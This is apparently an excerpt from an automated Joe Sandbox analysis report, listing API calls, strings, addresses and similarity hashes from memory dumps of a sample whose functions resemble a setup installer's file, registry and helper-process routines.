• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ErrorLast
• String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
• API String ID: 1452528299-3112430753
• Opcode ID: b969254c7af52069d00d450bc25108601270d2f9398ad690918fa25cf6f4b58e
• Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
• Opcode Fuzzy Hash: b969254c7af52069d00d450bc25108601270d2f9398ad690918fa25cf6f4b58e
• Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32 ref: 0045CBDA
• GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
• GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
• GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
  • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
• AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
• GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
• String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
• API String ID: 59345061-4263478283
• Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
• Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
• Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
• Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
• CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
• GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
• CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
• GetDC.USER32(00000000), ref: 0041B402
• CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
• ReleaseDC.USER32(00000000,00000000), ref: 0041B455
• SelectObject.GDI32(00000000,?), ref: 0041B470
• SelectObject.GDI32(?,00000000), ref: 0041B47F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
• SelectObject.GDI32(?,00000000), ref: 0041B4C7
• DeleteDC.GDI32(00000000), ref: 0041B4D0
• DeleteDC.GDI32(?), ref: 0041B4D9
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
• String ID:
• API String ID: 644427674-0
• Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
• Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
• Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
• Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
• SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
• String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
• API String ID: 971782779-3668018701
• Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
• Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
• Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
• Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
• RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
Strings
• RegOpenKeyEx, xrefs: 00454910
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
• , xrefs: 004548FE
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: QueryValue$FormatMessageOpen
• String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2812809588-1577016196
• Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
• Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
• Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
• Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
Strings
• v1.1.4322, xrefs: 004595C2
• SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
• v4.0.30319, xrefs: 004594F1
• v2.0.50727, xrefs: 0045955B
• .NET Framework version %s not found, xrefs: 00459609
• SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
• SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
• .NET Framework not found, xrefs: 0045961D
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Close$Open
• String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
• API String ID: 2976201327-446240816
• Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
• Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
• Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
• Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                            APIs
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                                                            Strings
                                                                                                                            • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                                                            • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                                                            • Helper process exited., xrefs: 00458AC5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                            • API String ID: 3355656108-1243109208
                                                                                                                            • Opcode ID: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                                            • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                                                            • Opcode Fuzzy Hash: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                                            • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Strings
• RegCreateKeyEx, xrefs: 004545C3
• , xrefs: 004545B1
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: CloseCreateFormatMessageQueryValue
• String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2481121983-1280779767
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
  • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
• CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
• SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
• CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
  • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
• DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
Strings
Similarity
• API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
• String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
• API String ID: 1549857992-2312673372
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
Strings
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
• API String ID: 4190037839-2312295185
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetActiveWindow.USER32 ref: 004629FC
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
• GetWindowRect.USER32(?,00000000), ref: 00462A76
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
Strings
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetActiveWindow.USER32 ref: 0042F194
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
• GetWindowRect.USER32(?,00000000), ref: 0042F20E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
Strings
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
Uniqueness
Uniqueness Score: -1.00%
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021B3858,00000000), ref: 00458C79
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021B3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021B3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021B3858,?,00000000,00458D90,?,00000000), ref: 00458D55
• GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021B3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                                                            • API String ID: 2182916169-3012584893
                                                                                                                            • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                                            • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                                                            • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                                            • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
• GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
• LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressErrorHandleLastLoadModuleProcType
• String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
• API String ID: 1914119943-2711329623
• Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
• Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
• Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
• Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RectVisible.GDI32(?,?), ref: 00416E13
• SaveDC.GDI32(?), ref: 00416E27
• IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
• RestoreDC.GDI32(?,?), ref: 00416E65
• CreateSolidBrush.GDI32(00000000), ref: 00416EE5
• FrameRect.USER32(?,?,?), ref: 00416F18
• DeleteObject.GDI32(?), ref: 00416F22
• CreateSolidBrush.GDI32(00000000), ref: 00416F32
• FrameRect.USER32(?,?,?), ref: 00416F65
• DeleteObject.GDI32(?), ref: 00416F6F
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
• String ID:
• API String ID: 375863564-0
• Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
• Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
• Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
• Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
• GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
• GetFileType.KERNEL32(?,000000F5), ref: 00404C11
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
• GetLastError.KERNEL32(000000F5), ref: 00404C46
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
• Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
• Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
